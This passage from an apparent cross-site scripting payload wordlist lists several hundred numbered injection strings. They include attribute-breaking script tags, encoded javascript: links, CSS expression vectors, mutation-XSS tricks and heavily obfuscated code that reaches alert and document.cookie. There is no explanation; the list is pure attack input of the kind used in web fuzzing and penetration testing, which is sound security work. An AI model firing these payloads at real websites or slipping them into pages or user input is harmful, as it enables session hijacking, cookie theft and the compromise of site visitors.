  4368. "><script src="data:text/plain,alert(1)"></script>
  4369. '><script src="data:text/plain,alert(1)"></script>
  4370. <script> if ('a'.trim() === '') { alert(1); } </script>
  4371. "><script> if ('a'.trim() === '') { alert(1); } </script>
  4372. '><script> if ('a'.trim() === '') { alert(1); } </script>
  4373. "'`><script>alert(1)</script>
  4374. "><script>alert(1)</script>
  4375. '><script>alert(1)</script>
  4376. "'`><img src=xxx:x onerror=alert(1)>
  4377. '`"><script>alert(1)</script>
  4378. "><script>alert(1)</script>
  4379. '><script>alert(1)</script>
  4380. `"'><img src=xxx:x onerror=alert(1)>
  4381. '"`><script>/* *alert(1)// */</script>
  4382. `'"><script>window['alert'](1)</script>
  4383. \u0031+\u0031\u005b'\145\166\141\154'\u005d\u0028'\141\154\145\162\164\50\61\51'\u0029
  4384. \u0030\u005b\u0022\x65\x76\x61\x6C"\u005d\u0028\u0027\x61\x6C\x65\x72\x74\x28\x31\x29'\u0029
  4385. 0['eval']('alert(1)')
  4386. <a href="javascript:\u0031+\u0031\u005b'\145\166\141\154'\u005d\u0028'\141\154\145\162\164\50\61\51'\u0029">X</a>
  4387. "><a href="javascript:\u0031+\u0031\u005b'\145\166\141\154'\u005d\u0028'\141\154\145\162\164\50\61\51'\u0029">X</a>
  4388. '><a href="javascript:\u0031+\u0031\u005b'\145\166\141\154'\u005d\u0028'\141\154\145\162\164\50\61\51'\u0029">X</a>
  4389. <a href="&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x5C&#x75&#x30&#x30&#x33&#x31&#x2B&#x5C&#x75&#x30&#x30&#x33&#x31&#x5C&#x75&#x30&#x30&#x35&#x62&#x27&#x5C&#x31&#x34&#x35&#x5C&#x31&#x36&#x36&#x5C&#x31&#x34&#x31&#x5C&#x31&#x35&#x34&#x27&#x5C&#x75&#x30&#x30&#x35&#x64&#x5C&#x75&#x30&#x30&#x32&#x38&#x27&#x5C&#x31&#x34&#x31&#x5C&#x31&#x35&#x34&#x5C&#x31&#x34&#x35&#x5C&#x31&#x36&#x32&#x5C&#x31&#x36&#x34&#x5C&#x35&#x30&#x5C&#x36&#x31&#x5C&#x35&#x31&#x27&#x5C&#x75&#x30&#x30&#x32&#x39">X</a>
  4390. "><a href="&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x5C&#x75&#x30&#x30&#x33&#x31&#x2B&#x5C&#x75&#x30&#x30&#x33&#x31&#x5C&#x75&#x30&#x30&#x35&#x62&#x27&#x5C&#x31&#x34&#x35&#x5C&#x31&#x36&#x36&#x5C&#x31&#x34&#x31&#x5C&#x31&#x35&#x34&#x27&#x5C&#x75&#x30&#x30&#x35&#x64&#x5C&#x75&#x30&#x30&#x32&#x38&#x27&#x5C&#x31&#x34&#x31&#x5C&#x31&#x35&#x34&#x5C&#x31&#x34&#x35&#x5C&#x31&#x36&#x32&#x5C&#x31&#x36&#x34&#x5C&#x35&#x30&#x5C&#x36&#x31&#x5C&#x35&#x31&#x27&#x5C&#x75&#x30&#x30&#x32&#x39">X</a>
  4391. '><a href="&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x5C&#x75&#x30&#x30&#x33&#x31&#x2B&#x5C&#x75&#x30&#x30&#x33&#x31&#x5C&#x75&#x30&#x30&#x35&#x62&#x27&#x5C&#x31&#x34&#x35&#x5C&#x31&#x36&#x36&#x5C&#x31&#x34&#x31&#x5C&#x31&#x35&#x34&#x27&#x5C&#x75&#x30&#x30&#x35&#x64&#x5C&#x75&#x30&#x30&#x32&#x38&#x27&#x5C&#x31&#x34&#x31&#x5C&#x31&#x35&#x34&#x5C&#x31&#x34&#x35&#x5C&#x31&#x36&#x32&#x5C&#x31&#x36&#x34&#x5C&#x35&#x30&#x5C&#x36&#x31&#x5C&#x35&#x31&#x27&#x5C&#x75&#x30&#x30&#x32&#x39">X</a>
  4392. <input id='1'><input id=1><script>alert(1)</script>
  4393. "><input id='1'><input id=1><script>alert(1)</script>
  4394. '><input id='1'><input id=1><script>alert(1)</script>
  4395. "><script>alert(1)</script>
  4396. '><script>alert(1)</script>
  4397. <a href="invalid:1" id=x name=y>X</a><a href="invalid:2" id=x name=y>X</a><script>alert(x.y[0])</script>
  4398. "><a href="invalid:1" id=x name=y>X</a><a href="invalid:2" id=x name=y>X</a><script>alert(x.y[0])</script>
  4399. '><a href="invalid:1" id=x name=y>X</a><a href="invalid:2" id=x name=y>X</a><script>alert(x.y[0])</script>
  4400. <a href=1 name=x>X</a><a href=1 name=x>X</a><script>alert(x.removeChild)//undefinedalert(x.parentNode)//undefined</script>
  4401. "><a href=1 name=x>X</a><a href=1 name=x>X</a><script>alert(x.removeChild)//undefinedalert(x.parentNode)//undefined</script>
  4402. '><a href=1 name=x>X</a><a href=1 name=x>X</a><script>alert(x.removeChild)//undefinedalert(x.parentNode)//undefined</script>
  4403. <a href="123" id=x>X</a><script>x='javascript:alert(1)'//only in compat!;</script>
  4404. "><a href="123" id=x>X</a><script>x='javascript:alert(1)'//only in compat!;</script>
  4405. '><a href="123" id=x>X</a><script>x='javascript:alert(1)'//only in compat!;</script>
  4406. <form name=self location="javascript:alert(1)"
  4407. "><form name=self location="javascript:alert(1)"
  4408. '><form name=self location="javascript:alert(1)">
  4409. "><form name=self location="javascript:alert(1)"
  4410. "><form name=self location="javascript:alert(1)"
  4411. '><form name=self location="javascript:alert(1)">
  4412. '><form name=self location="javascript:alert(1)"
  4413. "><form name=self location="javascript:alert(1)"
  4414. '><form name=self location="javascript:alert(1)"></form><script>if(top!=self){ top.location=self.location}</script>
  4415. "><form name=self location="javascript:alert(1)"></form><script>if(top!=self){ top.location=self.location}</script>
  4416. '><form name=self location="javascript:alert(1)"></form><script>if(top!=self){ top.location=self.location}</script>
  4417. <form name=self location="javascript&amp;#58;alert(1)"></form><script>if(top!=self){ top.location=self.location}</script>
  4418. "><form name=self location="javascript&amp;#58;alert(1)"></form><script>if(top!=self){ top.location=self.location}</script>
  4419. '><form name=self location="javascript&amp;#58;alert(1)"></form><script>if(top!=self){ top.location=self.location}</script>
  4420. <iframe name=x></iframe>"></iframe><a href="http://127.0.0.1:3555/xss_serve_payloads/X.html" target=x id=x></a><script>window.onload=function(){x.click()}</script>
  4421. "><iframe name=x></iframe>"></iframe><a href="http://127.0.0.1:3555/xss_serve_payloads/X.html" target=x id=x></a><script>window.onload=function(){x.click()}</script>
  4422. '><iframe name=x></iframe>"></iframe><a href="http://127.0.0.1:3555/xss_serve_payloads/X.html" target=x id=x></a><script>window.onload=function(){x.click()}</script>
  4423. %3Cform%20name%3D%22body%22%20onmouseover%3D%22alert(1)%22%20style%3D%22height%3A800px%22%3E%3Cfieldset%20name%3D%22attributes%22%3E%3Cform%3E%3C%2Fform%3E%3Cform%20name%3D%22parentNode%22%3E%3Cimg%20id%3D%22attributes%22%3E%3C%2Fform%3E%3C%2Ffieldset%3E%3C%2Fform%3E
  4424. "onmouseover="alert(1)"a="
  4425. 'onmouseover='alert(1)'a='
  4426. '%20onmouseover=alert(1)'
  4427. %22%20onmouseover=javascript:alert(1)%20%22
  4428. \');alert(1);//
  4429. );alert(1)//
  4430. ');alert(1)//
  4431. %26%2339;-alert(1)//
  4432. %22);alert(1);//
  4433. %E0<body onload=alert(1)>
  4434. %00<body onload=alert(1)>
  4435. X'%20alert(1)%2F%2F
  4436. X%22%20alert(1)%2F%2F
  4437. %5C%5C'%2Balert(1)%3B%2F%2F
  4438. %3Cscript%3Ealert(1)%3B%3C%2Fscript%3E
  4439. alert(1)%3B
  4440. %3Cscript%3Ea%3D%2FX%2F
  4441. alert(1)%3C%2Fscript%3E
  4442. %22%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E
  4443. X%20-%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E
  4444. X%20%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E
  4445. <SCRIPT>alert(1);</SCRIPT>
  4446. "><SCRIPT>alert(1);</SCRIPT>
  4447. '><SCRIPT>alert(1);</SCRIPT>
  4448. <META HTTP-EQUIV="Link" Content="<javascript:alert(1)>; REL=stylesheet">
  4449. "><META HTTP-EQUIV="Link" Content="<javascript:alert(1)>; REL=stylesheet">
  4450. '><META HTTP-EQUIV="Link" Content="<javascript:alert(1)>; REL=stylesheet">
  4451. <STYLE>.X{background-image:url("javascript:alert(1)");}</STYLE>
  4452. "><STYLE>.X{background-image:url("javascript:alert(1)");}</STYLE>
  4453. '><STYLE>.X{background-image:url("javascript:alert(1)");}</STYLE><A CLASS=X></A>
  4454. "><STYLE>.X{background-image:url("javascript:alert(1)");}</STYLE><A CLASS=X></A>
  4455. '><STYLE>.X{background-image:url("javascript:alert(1)");}</STYLE><A CLASS=X></A>
  4456. "><A CLASS=X></A>
  4457. '><A CLASS=X></A>
  4458. <!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert(1);">
  4459. "><!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert(1);">
  4460. '><!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert(1);">
  4461. <img src=a onerror=alert(1)
  4462. "><img src=a onerror=alert(1)
  4463. '><img src=a onerror=alert(1) %0A>
  4464. "><img src=a onerror=alert(1) %0A>
  4465. '><img src=a onerror=alert(1) %0A>
  4466. <img src="x" class="''onerror=alert(1)">
  4467. "><img src="x" class="''onerror=alert(1)">
  4468. '><img src="x" class="''onerror=alert(1)">
  4469. 0<aside xmlns="x><img src=x onerror=alert(1)">1</aside>
  4470. 0<aside xmlns="x><script>alert(1)</script>
  4471. "><script>alert(1)</script>
  4472. '><script>alert(1)</script>">1</aside>
  4473. 0<aside xmlns="foo:img src=x onerror=alert(1)>">123
  4474. <p style="font-family:'\22\3bx:expression(alert(1))/*'">
  4475. "><p style="font-family:'\22\3bx:expression(alert(1))/*'">
  4476. '><p style="font-family:'\22\3bx:expression(alert(1))/*'">
  4477. <p style="font-family: 'foo\27\3b color\3a expression(alert(1))/*
  4478. "><p style="font-family: 'foo\27\3b color\3a expression(alert(1))/*
  4479. '><p style="font-family: 'foo\27\3b color\3a expression(alert(1))/*
  4480. <p style="fon\22\3e\3cimg\20src\3dx\20onerror\3d alert\28 1\29\3et-family:'foobar'">
  4481. "><p style="fon\22\3e\3cimg\20src\3dx\20onerror\3d alert\28 1\29\3et-family:'foobar'">
  4482. '><p style="fon\22\3e\3cimg\20src\3dx\20onerror\3d alert\28 1\29\3et-family:'foobar'">
  4483. <p style="filter: 'expression(alert(1))'">
  4484. "><p style="filter: 'expression(alert(1))'">
  4485. '><p style="filter: 'expression(alert(1))'">
  4486. <svg><style>&ltimg src=x onerror=alert(1)&gt</svg>
  4487. "><svg><style>&ltimg src=x onerror=alert(1)&gt</svg>
  4488. '><svg><style>&ltimg src=x onerror=alert(1)&gt</svg>
  4489. <p style="font-family: 'foo&amp;x5c;27&amp;#x5c;3bx:expr&amp;#x65;ession(alert(1))'">
  4490. "><p style="font-family: 'foo&amp;x5c;27&amp;#x5c;3bx:expr&amp;#x65;ession(alert(1))'">
  4491. '><p style="font-family: 'foo&amp;x5c;27&amp;#x5c;3bx:expr&amp;#x65;ession(alert(1))'">
  4492. <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
  4493. "><iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
  4494. '><iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
  4495. <svg><script xlink:href=data&colon;,window.open('http://www.opensecurity.in')></script
  4496. "><svg><script xlink:href=data&colon;,window.open('http://www.opensecurity.in')></script
  4497. '><svg><script xlink:href=data&colon;,window.open('http://www.opensecurity.in')></script
  4498. http://www.opensecurity<script .in>alert(document.location)</script
  4499. &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver
  4500. <div/style="width:expression(confirm(1))">X</div>
  4501. "><div/style="width:expression(confirm(1))">X</div>
  4502. '><div/style="width:expression(confirm(1))">X</div>
  4503. perl -e 'print "&lt;IMG SRC=java\0script:alert(\"X\")&gt;";' &gt; out
  4504. perl -e 'print "&lt;SCR\0IPT&gt;alert(\"X\")&lt;/SCR\0IPT&gt;";' &gt; out
  4505. perl -e 'print "<IMG SRC=java\0script:alert(1)>";'> out
  4506. window["ale"+(!![]+[])[-~[]]+(!![]+[])[+[]]]()
  4507. window["ale"+"\x72\x74"]()
  4508. window["\x61\x6c\x65\x72\x74"]()
  4509. window['ale'+(!![]+[])[-~[]]+(!![]+[])[+[]]]()
  4510. window['ale'+'\x72\x74']()
  4511. window['\x61\x6c\x65\x72\x74']()
  4512. window[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))
  4513. window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]
  4514. this["ale"+(!![]+[])[-~[]]+(!![]+[])[+[]]]()
  4515. this["ale"+"\x72\x74"]()
  4516. this["\x61\x6c\x65\x72\x74"]()
  4517. this['ale'+'\x72\x74']()
  4518. this['\x61\x6c\x65\x72\x74']()
  4519. this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))
  4520. this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]
  4521. this["document"]["cookie"]
  4522. this["document"]["\x63\x6f\x6f\x6b\x69\x65"]
  4523. this["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["cookie"]
  4524. this["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"]
  4525. this["document"][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"kie"]
  4526. this["document"][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"\x6b\x69\x65"]
  4527. this["docum"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"\x6b\x69\x65"]
  4528. this["docum"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"kie"]
  4529. this["docum"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]["\x63\x6f\x6f\x6b\x69\x65"]
  4530. this["docum"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]["cookie"]
  4531. this["\x64\x6f\x63\x75\x6d"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"\x6b\x69\x65"]
  4532. this["\x64\x6f\x63\x75\x6d"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"kie"]
  4533. this["\x64\x6f\x63\x75\x6d"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]["\x63\x6f\x6f\x6b\x69\x65"]
  4534. this["\x64\x6f\x63\x75\x6d"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]["cookie"]
  4535. this['document']['cookie']
  4536. this['document']['\x63\x6f\x6f\x6b\x69\x65']
  4537. this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['cookie']
  4538. this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x63\x6f\x6f\x6b\x69\x65']
  4539. this['document'][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'kie']
  4540. this['document'][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'\x6b\x69\x65']
  4541. this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'\x6b\x69\x65']
  4542. this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'kie']
  4543. this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]['\x63\x6f\x6f\x6b\x69\x65']
  4544. this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]['cookie']
  4545. this['\x64\x6f\x63\x75\x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'\x6b\x69\x65']
  4546. this['\x64\x6f\x63\x75\x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'kie']
  4547. this['\x64\x6f\x63\x75\x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]['\x63\x6f\x6f\x6b\x69\x65']
  4548. this['\x64\x6f\x63\x75\x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]['cookie']
  4549. document["cookie"]
  4550. document["\x63\x6f\x6f\x6b\x69\x65"]
  4551. document[({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"kie"]
  4552. document[({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"\x6b\x69\x65"]
  4553. document['cookie']
  4554. document['\x63\x6f\x6f\x6b\x69\x65']
  4555. document[({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'kie']
  4556. document[({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'\x6b\x69\x65']
  4557. %3Cscript%3Edocument.body.innerHTML=%22%3Ca%20onmouseover%0B=location=%27\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x26\x72\x70\x61\x72\x3B%27%3E%3Cinput%20name=attributes%3E%22;%3C/script%3E
  4558. <meta http-equiv="X-UA-Compatible" content="IE=5"><p style="font-family:',;a\\22\\3e\\3cimg\\20src\\3dx\\20onerror\\3d\\61lert\\28\\31\\29\\3e:1'">oh-oh</p>
  4559. "><meta http-equiv="X-UA-Compatible" content="IE=5"><p style="font-family:',;a\\22\\3e\\3cimg\\20src\\3dx\\20onerror\\3d\\61lert\\28\\31\\29\\3e:1'">oh-oh</p>
  4560. '><meta http-equiv="X-UA-Compatible" content="IE=5"><p style="font-family:',;a\\22\\3e\\3cimg\\20src\\3dx\\20onerror\\3d\\61lert\\28\\31\\29\\3e:1'">oh-oh</p>
  4561. <iframe/onload=action=/confir/.source+'m';eval(action)(1)>
  4562. "><iframe/onload=action=/confir/.source+'m';eval(action)(1)>
  4563. '><iframe/onload=action=/confir/.source+'m';eval(action)(1)>
  4564. <!--[if WindowsEdition]><script>confirm(1);</script><![endif]-->
  4565. "><!--[if WindowsEdition]><script>confirm(1);</script><![endif]-->
  4566. '><!--[if WindowsEdition]><script>confirm(1);</script><![endif]-->
  4567. <img src=x onerror=confirm(/X/)>
  4568. "><img src=x onerror=confirm(/X/)>
  4569. '><img src=x onerror=confirm(/X/)>
  4570. <form/action=ja&Tab;vascr&Tab;ipt&colon;confirm(1)> <button/type=submit>
  4571. "><form/action=ja&Tab;vascr&Tab;ipt&colon;confirm(1)> <button/type=submit>
  4572. '><form/action=ja&Tab;vascr&Tab;ipt&colon;confirm(1)> <button/type=submit>
  4573. <style/onload = !-alert&#x28;1&#x29;>
  4574. "><style/onload = !-alert&#x28;1&#x29;>
  4575. '><style/onload = !-alert&#x28;1&#x29;>
  4576. <iframe/name="if(0){\u0061lert(1)}else{\u0061lert(1)}"/onload="eval(name)";>
  4577. "><iframe/name="if(0){\u0061lert(1)}else{\u0061lert(1)}"/onload="eval(name)";>
  4578. '><iframe/name="if(0){\u0061lert(1)}else{\u0061lert(1)}"/onload="eval(name)";>
  4579. <svg><‮GMO=`<ftw=`skrowtillehehtwoh; onload=confirm(location);
  4580. "><svg><‮GMO=`<ftw=`skrowtillehehtwoh; onload=confirm(location);
  4581. '><svg><‮GMO=`<ftw=`skrowtillehehtwoh; onload=confirm(location);
  4582. "><img src=x onerror=confirm(1);>
  4583. #&quot;&gt;&lt;img src=x onerror=confirm(1);&gt;
  4584. <img/src=x alt=confirm(1) onerror=eval(alt)>
  4585. "><img/src=x alt=confirm(1) onerror=eval(alt)>
  4586. '><img/src=x alt=confirm(1) onerror=eval(alt)>
  4587. <img src=x onerror=alert(1)//>
  4588. "><img src=x onerror=alert(1)//>
  4589. '><img src=x onerror=alert(1)//>
  4590. <svg><g/onload=alert(1)//
  4591. "><svg><g/onload=alert(1)//
  4592. '><svg><g/onload=alert(1)//
  4593. <iframe/\/src=jAva&Tab;script:alert(1)>
  4594. "><iframe/\/src=jAva&Tab;script:alert(1)>
  4595. '><iframe/\/src=jAva&Tab;script:alert(1)>
  4596. <math><mi//xlink:href="data:x,<script>alert(1)</script>
  4597. "><script>alert(1)</script>
  4598. '><script>alert(1)</script>">
  4599. onClick="alert('Hello \u0022>')"
  4600. onload=alert(1)
  4601. " onload=alert(1) "
  4602. " onload=alert(1)
  4603. onload=alert(1) "
  4604. " onload=alert(1) id="a
  4605. onload =alert(1) id="a
  4606. <a href='
  4607. "><a href='
  4608. '><a href='
  4609. javascript:alert(1)'>a</a>
  4610. <listing>&lt;img onerror="alert(1);//" src=1&gt;<t t></listing>
  4611. "><listing>&lt;img onerror="alert(1);//" src=1&gt;<t t></listing>
  4612. '><listing>&lt;img onerror="alert(1);//" src=1&gt;<t t></listing>
  4613. <img src=x id/=' onerror=alert(1)//'>
  4614. "><img src=x id/=' onerror=alert(1)//'>
  4615. '><img src=x id/=' onerror=alert(1)//'>
  4616. <textarea>X</textarea><!--</textarea><img src=x onerror=alert(1)>-->
  4617. "><textarea>X</textarea><!--</textarea><img src=x onerror=alert(1)>-->
  4618. '><textarea>X</textarea><!--</textarea><img src=x onerror=alert(1)>-->
  4619. <b><noscript><!-- </noscript><img src=xx: onerror=alert(1) --></noscript>
  4620. "><b><noscript><!-- </noscript><img src=xx: onerror=alert(1) --></noscript>
  4621. '><b><noscript><!-- </noscript><img src=xx: onerror=alert(1) --></noscript>
  4622. <b><noscript><a alt="</noscript><img src=xx: onerror=alert(1)>"></noscript>
  4623. "><b><noscript><a alt="</noscript><img src=xx: onerror=alert(1)>"></noscript>
  4624. '><b><noscript><a alt="</noscript><img src=xx: onerror=alert(1)>"></noscript>
  4625. <body><template><s><template><s><img src=x onerror=alert(1)>X</s></template></s></template>
  4626. "><body><template><s><template><s><img src=x onerror=alert(1)>X</s></template></s></template>
  4627. '><body><template><s><template><s><img src=x onerror=alert(1)>X</s></template></s></template>
  4628. <a href="javascript:alert(1)">X<a>
  4629. "><a href="javascript:alert(1)">X<a>
  4630. '><a href="javascript:alert(1)">X<a>
  4631. <option><style></option></select><b><img src=xx: onerror=alert(1)></style></option>
  4632. <option><iframe></select><b><script>alert(1)</script>
  4633. "><script>alert(1)</script>
  4634. '><script>alert(1)</script></iframe></option>
  4635. <b><style><style/><img src=xx: onerror=alert(1)>
  4636. "><b><style><style/><img src=xx: onerror=alert(1)>
  4637. '><b><style><style/><img src=xx: onerror=alert(1)>
  4638. <b><style><style////><img src=xx: onerror=alert(1)></style>
  4639. "><b><style><style////><img src=xx: onerror=alert(1)></style>
  4640. '><b><style><style////><img src=xx: onerror=alert(1)></style>
  4641. <image name=body><image name=adoptNode>X<image name=firstElementChild><svg onload=alert(1)>
  4642. "><image name=body><image name=adoptNode>X<image name=firstElementChild><svg onload=alert(1)>
  4643. '><image name=body><image name=adoptNode>X<image name=firstElementChild><svg onload=alert(1)>
  4644. <image name=activeElement><svg onload=alert(1)>
  4645. "><image name=activeElement><svg onload=alert(1)>
  4646. '><image name=activeElement><svg onload=alert(1)>
  4647. <image name=body><img src=x><svg onload=alert(1); autofocus>, <keygen onfocus=alert(1); autofocus>
  4648. "><image name=body><img src=x><svg onload=alert(1); autofocus>, <keygen onfocus=alert(1); autofocus>
  4649. '><image name=body><img src=x><svg onload=alert(1); autofocus>, <keygen onfocus=alert(1); autofocus>
  4650. <div onmouseout="javascript:alert(/X/)" x=yscript: n>X
  4651. "><div onmouseout="javascript:alert(/X/)" x=yscript: n>X
  4652. '><div onmouseout="javascript:alert(/X/)" x=yscript: n>X
  4653. <div wow=removeme onmouseover=alert(1)>text
  4654. "><div wow=removeme onmouseover=alert(1)>text
  4655. '><div wow=removeme onmouseover=alert(1)>text
  4656. <input x=javascript: autofocus onfocus=alert(1)><svg id=1 onload=alert(1)></svg>
  4657. "><input x=javascript: autofocus onfocus=alert(1)><svg id=1 onload=alert(1)></svg>
  4658. '><input x=javascript: autofocus onfocus=alert(1)><svg id=1 onload=alert(1)></svg>
  4659. <form action="javascript:alert(1)"><button>X</button></form>
  4660. "><form action="javascript:alert(1)"><button>X</button></form>
  4661. '><form action="javascript:alert(1)"><button>X</button></form>
  4662. 0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=='))
  4663. <input onfocus=alert(1) autofocus>
  4664. "><input onfocus=alert(1) autofocus>
  4665. '><input onfocus=alert(1) autofocus>
  4666. <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg
  4667. "><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg
  4668. '><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>
  4669. "><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>
  4670. '><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>
  4671. <x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>
  4672. "><x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>
  4673. '><x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>
  4674. <input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>
  4675. "><input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>
  4676. '><input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>
  4677. <script>({0:#0=alert/#0#/#0#(0)})</script>
  4678. "><script>({0:#0=alert/#0#/#0#(0)})</script>
  4679. '><script>({0:#0=alert/#0#/#0#(0)})</script>
  4680. X<x style=`behavior:url(#default#time2)` onbegin=`alert(1)` >
  4681. <meta charset="x-mac-farsi">¼script ¾alert(1)//¼/script ¾
  4682. "><meta charset="x-mac-farsi">¼script ¾alert(1)//¼/script ¾
  4683. '><meta charset="x-mac-farsi">¼script ¾alert(1)//¼/script ¾
  4684. <input onblur=focus() autofocus><input>
  4685. "><input onblur=focus() autofocus><input>
  4686. '><input onblur=focus() autofocus><input>
  4687. <form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(1)>X</button>
  4688. "><form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(1)>X</button>
  4689. '><form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(1)>X</button>
  4690. 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=alert(1)>`>
  4691. 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=alert(1)>>
  4692. <link rel=stylesheet href=data:,*%7bx:expression(alert(1))%7d
  4693. "><link rel=stylesheet href=data:,*%7bx:expression(alert(1))%7d
  4694. '><link rel=stylesheet href=data:,*%7bx:expression(alert(1))%7d
  4695. <style>@import "data:,*%7bx:expression(alert(1))%7D";</style>
  4696. "><style>@import "data:,*%7bx:expression(alert(1))%7D";</style>
  4697. '><style>@import "data:,*%7bx:expression(alert(1))%7D";</style>
